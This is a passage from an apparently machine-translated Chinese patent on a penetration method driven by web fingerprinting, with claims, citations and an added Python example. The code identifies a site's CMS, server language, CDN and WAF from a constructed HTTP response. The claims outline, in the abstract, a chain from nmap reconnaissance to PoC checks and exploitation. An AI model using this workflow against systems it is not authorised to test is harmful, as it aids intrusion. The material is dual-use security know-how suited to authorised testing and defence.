a second CMS information determining unit for determining the correspondence between keywords and CMS information, acquiring the keywords in the home page or a designated page by accessing that page, matching the acquired keywords against the keyword-to-CMS correspondence, and obtaining the CMS information corresponding to the acquired keywords according to the matching result;
a third CMS information determining unit for identifying CMS information from the banner information;
a fourth CMS information determining unit configured to determine the CMS information from the URL address;
a first development language determining unit for acquiring dynamic links with a crawler and judging the development language used by the server from the dynamic links;
and a second development language determining unit for identifying the development language used by the server through the X-Powered-By or Set-Cookie header.
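As an added example that is not the patent's own code, the following Python applies the CMS identification steps of this embodiment (md5 rule base, page keywords, banner, URL) and the X-Powered-By / Set-Cookie language check to one captured HTTP response, filling the report in the CMS > CDN > WAF priority order; it is the kind of check an operator runs against their own site to see what its responses reveal. Every rule table, hash, header value and the sample response is constructed, and the function names are mine.

```python
import hashlib
import re

# Constructed rule base (the patent keeps these mappings in a "rule base";
# every hash, pattern and header value below is illustrative, not authoritative).
MD5_TO_CMS = {hashlib.md5(b"/* constructed wp-embed stub */").hexdigest(): "WordPress"}
KEYWORD_TO_CMS = [  # keywords looked up in the home page or a designated page
    (re.compile(r'<meta name="generator" content="WordPress', re.I), "WordPress"),
    (re.compile(r"/wp-content/", re.I), "WordPress"),
]
BANNER_TO_CMS = [(re.compile(r"DedeCMS", re.I), "DedeCMS")]          # Server banner rules
URL_TO_CMS = [(re.compile(r"/index\.php\?s=/", re.I), "ThinkPHP")]   # URL shape rules
POWERED_BY_TO_LANG = [("php", "PHP"), ("asp.net", "ASP.NET"), ("express", "Node.js")]
COOKIE_TO_LANG = [("PHPSESSID", "PHP"), ("JSESSIONID", "Java"), ("ASP.NET_SessionId", "ASP.NET")]
# (header name, substring that must appear in its value, label); "" means presence suffices
CDN_RULES = [("server", "cloudflare", "Cloudflare"), ("x-cache", "hit", "caching CDN")]
WAF_RULES = [("server", "safedog", "Safedog"), ("x-powered-by-360wzb", "", "360 WZB")]


def _first_match(rules, text):
    """Label of the first regex rule that matches text, else None."""
    for pattern, label in rules:
        if pattern.search(text):
            return label
    return None


def identify_cms(url, banner, body, static_files):
    """CMS in the patent's order: md5 of static files, page keywords, banner, URL.
    Returns (cms, evidence) so the report records which step produced the answer."""
    for content in static_files.values():
        cms = MD5_TO_CMS.get(hashlib.md5(content).hexdigest())
        if cms:
            return cms, "md5"
    for evidence, rules, text in (("keyword", KEYWORD_TO_CMS, body),
                                  ("banner", BANNER_TO_CMS, banner),
                                  ("url", URL_TO_CMS, url)):
        cms = _first_match(rules, text)
        if cms:
            return cms, evidence
    return None, None


def identify_language(headers):
    """Development language from X-Powered-By first, then Set-Cookie session names."""
    powered = headers.get("x-powered-by", "").lower()
    for needle, lang in POWERED_BY_TO_LANG:
        if needle in powered:
            return lang
    cookies = headers.get("set-cookie", "")
    for needle, lang in COOKIE_TO_LANG:
        if needle in cookies:
            return lang
    return None


def _header_rule(headers, rules):
    """Label of the first (header, substring, label) rule satisfied, else None."""
    for header, needle, label in rules:
        if header in headers and needle in headers[header].lower():
            return label
    return None


def fingerprint(url, headers, body, static_files):
    """Fingerprint one captured response in the priority order CMS > CDN > WAF."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    cms, evidence = identify_cms(url, h.get("server", ""), body, static_files)
    return {"cms": cms, "cms_evidence": evidence, "language": identify_language(h),
            "cdn": _header_rule(h, CDN_RULES), "waf": _header_rule(h, WAF_RULES)}


# Constructed response, as captured from a site the operator owns.
SAMPLE = {
    "url": "https://example.test/index.php?s=/home",
    "headers": {"Server": "nginx/1.18.0", "X-Powered-By": "PHP/7.4.3",
                "Set-Cookie": "PHPSESSID=abc123; path=/", "X-Cache": "HIT from cdn-edge"},
    "body": '<html><head><meta name="generator" content="WordPress 6.2"></head></html>',
    "static_files": {"wp-embed.min.js": b"/* constructed wp-embed stub */"},
}
```

Because the md5 step runs first, the sample is attributed to WordPress by file hash even though the page keywords and the URL shape would each have given an answer on their own.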
In one embodiment, the fingerprint information penetration module comprises:
a penetration unit for determining vulnerabilities according to the fingerprint information and, once the existence of a vulnerability is confirmed, performing penetration based on that vulnerability through an exploit (exp).
The embodiment of the invention achieves the following technical effects:
a web fingerprint information judging method covering multiple categories, multiple types and a larger range is realized, so the judgment result is more accurate; the fingerprint information is determined according to a preset priority order, so efficiency is higher; vulnerabilities are matched according to the more accurate web fingerprint judgment result, and whether each vulnerability really exists is checked through a vulnerability poc; after the existence of a vulnerability is confirmed, it is exploited through an exp, achieving accurate penetration of the target.
It will be apparent to those skilled in the art that the modules or steps of the embodiments of the invention described above may be implemented in a general purpose computing device, they may be concentrated on a single computing device, or distributed across a network of computing devices, they may alternatively be implemented in program code executable by computing devices, so that they may be stored in a storage device for execution by computing devices, and in some cases, the steps shown or described may be performed in a different order than what is shown or described, or they may be separately fabricated into individual integrated circuit modules, or a plurality of modules or steps in them may be fabricated into a single integrated circuit module. Thus, embodiments of the invention are not limited to any specific combination of hardware and software.
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, and various modifications and variations can be made to the embodiments of the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.

Claims (6)

1. A web fingerprint information based penetration method, comprising the steps of:
judging penetration targets according to the website building form, and determining penetration ideas of one or more fingerprint information aiming at each penetration target;
the form of construction comprises any one or any combination of the following:
multi-directory sites, multi-port sites, multi-domain name sites, and multi-client sites;
the penetration target comprises any one or any combination of the following:
a main directory site and a sub-directory site of the multi-directory site;
each port of the multi-port site;
a website of a multi-domain name site;
PC end site and mobile end site of the multi-client site;
determining one or more penetration ideas of fingerprint information for each penetration target, wherein the penetration ideas comprise:
determining a penetration idea for each CMS, the penetration idea comprising:
each directory site of the same website uses a penetration method;
each port of the same website uses a penetration method;
multiple domain name sites of the same website use the same penetration method;
different penetration methods are used by the PC end and the mobile end of the same website;
analyzing all site information of the penetration target to determine a fingerprint detection object, wherein the fingerprint detection object comprises any one or any combination of the following components:
CMS information, CDN information, and WAF information;
the preset priority order of the fingerprint detection objects is from high to low: CMS information, CDN information, WAF information;
according to a preset priority order, fingerprint information is determined from the penetration idea of the fingerprint information and the object of fingerprint detection, penetration is performed according to the fingerprint information, a vulnerability is determined according to the fingerprint information, whether the matched vulnerability exists is detected through a vulnerability poc, and penetration is performed based on the vulnerability through an exp when the existence of the vulnerability is determined.
2. The web fingerprint information based penetration method of claim 1, wherein analyzing all site information of the penetration target to determine the fingerprint-detected object comprises:
remotely judging the server type of a website by using a PING command or by modifying the web page suffix and observing the feedback information, acquiring the server type, acquiring the server version through an nmap scan according to the server type, and determining the application server, IP (Internet Protocol) address, domain name information and port information as objects of fingerprint detection according to the server type and the server version;
judging the type of a container of a website through the type of the server and the version of the server, judging the type of software and the version of software of a Web server according to the type of the container, analyzing the vulnerability of the Web server according to the type of software and the version of software of the Web server, and determining the Web server as a fingerprint detection object according to the analyzed vulnerability;
according to the software type and the software version of the Web server, determining a development language as an object of fingerprint detection;
judging the type of a database according to system table information or according to system variables of a server prestored in the database, and determining a development language as an object of fingerprint detection according to the type of the database.
3. The web fingerprint information based penetration method according to any one of claims 1 to 2, wherein determining fingerprint information from a penetration idea of the fingerprint information and the fingerprint detected object comprises:
judging the type of a static file according to the website building form of the website and the site information, grabbing an md5 value according to the type of the static file, and obtaining CMS information corresponding to the grabbed md5 value according to the mapping relation between the md5 and the CMS in a rule base;
determining the corresponding relation between keywords and CMS information, acquiring the keywords in a home page or a designated page by accessing the home page or the designated page, matching the acquired keywords with the corresponding relation between the keywords and the CMS information, and acquiring the CMS information corresponding to the acquired keywords according to a matching result;
identifying the CMS information by means of the banner information;
judging the CMS information according to the URL address;
utilizing a crawler to acquire dynamic links, and judging development languages used by a server according to the dynamic links;
identifying the development language used by the server through X-Powered-By or Set-Cookie.
4. A web fingerprint information based penetration apparatus, comprising:
a penetration idea acquisition module for judging penetration targets according to the website building form and determining one or more penetration ideas of the fingerprint information for each penetration target, wherein the website building form comprises any one or any combination of the following: multi-directory sites, multi-port sites, multi-domain name sites, and multi-client sites; the penetration targets comprise any one or any combination of the following: a main directory site and a sub-directory site of a multi-directory site, each port of a multi-port site, a website of a multi-domain name site, and the PC (personal computer) end site and mobile end site of a multi-client site; and determining one or more penetration ideas of the fingerprint information for each penetration target comprises: determining a penetration idea for each CMS, the penetration idea comprising: each directory site of the same website uses a penetration method, each port of the same website uses a penetration method, multiple domain name sites of the same website use the same penetration method, and the PC end and the mobile end of the same website use different penetration methods;
the fingerprint detection object acquisition module is used for analyzing all site information of the penetration target to determine a fingerprint detection object, and the fingerprint detection object comprises any one or any combination of the following components: CMS information, CDN information, and WAF information; the preset priority order of the fingerprint detection objects is from high to low: CMS information, CDN information, WAF information;
the fingerprint information penetration module for determining fingerprint information, according to a preset priority order, from the penetration idea of the fingerprint information and the object of fingerprint detection, performing penetration according to the fingerprint information, determining a vulnerability according to the fingerprint information, detecting whether the matched vulnerability exists through a vulnerability poc, and performing penetration based on the vulnerability through an exp when the vulnerability is determined to exist.
5. A computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, characterized in that the processor implements the web fingerprint information based penetration method of any one of claims 1 to 3 when executing the computer program.
6. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program that performs the web fingerprint information based penetration method of any one of claims 1 to 3.
CN202211408295.7A 2022-11-10 2022-11-10 Penetration method, device, equipment and medium based on web fingerprint information Active CN115941280B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202211408295.7A CN115941280B (en) 2022-11-10 2022-11-10 Penetration method, device, equipment and medium based on web fingerprint information

Publications (2)

Publication Number Publication Date
CN115941280A CN115941280A (en) 2023-04-07
CN115941280B true CN115941280B (en) 2024-01-26

Family

ID=86655150

Country Status (1)

Country Link
CN (1) CN115941280B (en)

Families Citing this family (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117312707A (en) * 2023-09-05 2023-12-29 东南大学 Website fingerprint generation method based on dynamic and static feature combination

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110765333A (en) * 2019-08-14 2020-02-07 奇安信科技集团股份有限公司 Method and device for collecting website information, storage medium and electronic device
CN110879891A (en) * 2019-08-14 2020-03-13 奇安信科技集团股份有限公司 Vulnerability detection method and device based on web fingerprint information
CN111131236A (en) * 2019-12-23 2020-05-08 杭州安恒信息技术股份有限公司 Web fingerprint detection device, method, equipment and medium
CN114036059A (en) * 2021-11-17 2022-02-11 南方电网调峰调频发电有限公司 Automatic penetration testing system and method for power grid system and computer equipment
CN114528457A (en) * 2021-12-31 2022-05-24 北京邮电大学 Web fingerprint detection method and related equipment
CN114666104A (en) * 2022-03-09 2022-06-24 国能信息技术有限公司 Penetration testing method, system, computer equipment and storage medium

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US10547628B2 (en) * 2016-05-06 2020-01-28 Sitelock, Llc Security weakness and infiltration detection and repair in obfuscated website content

Also Published As

Publication number Publication date
CN115941280A (en) 2023-04-07

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant